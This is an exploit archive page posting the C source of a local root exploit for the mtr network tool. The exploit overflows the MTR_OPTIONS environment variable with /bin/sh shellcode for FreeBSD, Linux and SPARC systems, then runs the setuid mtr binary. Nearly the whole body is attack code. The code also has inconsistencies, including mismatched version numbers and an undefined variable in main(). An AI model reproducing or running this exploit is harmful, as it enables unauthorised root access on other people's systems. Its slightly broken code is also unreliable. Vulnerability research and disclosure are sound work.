what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mtrewt.c

mtrewt.c
Posted Apr 3, 2003

Local root exploit for mtr versions lower than 4.0.6. Vulnerability originally found by KF of Snosoft.

tags | exploit, local, root
SHA-256 | d8abcbb929ad05dfb21ec534c2ad715d568011e3df645bbfcfb8825327e5eb29

mtrewt.c

Change Mirror Download
/******************************************************************* 
* mtrewt.c - local suid root compromise *
* &by PREEM of ADIDAS (All day I dream about Sploiting!!) *
********************************************************************
* *
* This is unpublished proprietary source code of ADIDAS - !@#!#$! *
* *
* (C) COPYRIGHT ADIDAS (All Day I Dream About Sploiting) *
* ADIDAS IS A REGISTERED TRADEMARK (c) , 2003 *
********************************************************************
* All Rights Reserved *
* *
* bug found by KF of Snosoft *
* *
* keep it private! *
* don't distribute! *
********************************************************************
* Vulnerable: mtr <4.0.6 (Unix)/MTR_OPTIONS/ PRIVATE DISTRIBUTION!!*
********************************************************************
* Greetz: They Know who they are!! All my friends :)) *
********************************************************************
*/


#include <stdlib.h>
#include <stdio.h>
#include <errno.h>

#define OFFSET 524 /*it may differ*/

void syntax(char *progname)
{
fprintf(stderr, "[+] Vuln in mtr <0.46\n");
fprintf(stderr, "[+] Usage: %s ostype\n\n", progname);
fprintf(stderr," [+] OS types are: [1] FreeBSD [2] Linux [3] SPARC/Solaris [4] SPARC/SunOS\n\n");
exit(1);
}

int main(int argc, char *argv[])
{
char *egg;
char buf[4092];
char buf2[4128];
int os, i;

if (argc != 2) syntax(argv[0]);

os = atoi(argv[1]);
if (os == 1)
egg =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";
else if (os == 2)
egg =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
// "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
// "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
// "\xb0\x3b\x50\xcd\x80";
else if (os == 3)
egg = /* must find another shellcode without \x20 */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";
// "\x20\xbf\xff\xff\x20\xbf\xff\xff"
// "\x7f\xff\xff\xff\x90\x03\xe0\x20\x92\x02\x20\x10\xc0\x22\x20\x08"
// "\xd0\x22\x20\x10\xc0\x22\x20\x14\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
else if (os == 4)
egg = /* idem */
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff"
"\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01";
else syntax(argv[0]);

fprintf(stderr, "[+] Vuln in mtr <0.46 - by PREEM of ADIDAS\n");
fprintf(stderr, "[+] Usage: %s ostype\n\n", progname);
fprintf(stderr," [+] OS types are: [1] FreeBSD [2] Linux [3] SPARC/Solaris [4] SPARC/SunOS\n\n");


for (i = 0; i < 128; i++) /* fill the first 128 records */
strcat(buf, "A ");

for (i = 0; i < 10; i++) /* fill extra 10 records for overflow (see mtr.c) */
{ /* 10 extra records should be enough for any syst */
strcat(buf, egg);
strcat(buf, " ");
}

strcpy(buf2, "MTR_OPTIONS=");
printf("[+] Please Wait...");
strcat(buf2, buf);
putenv(buf2);
printf("[+] Voila! Check for m4d rewt..");
execl("/usr/bin/mtr", "mtr", NULL); //might be in different path ;) work it 0ff!

}

/* PRIVATE ADIDAS SOURCE MATERIAL!!! */
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close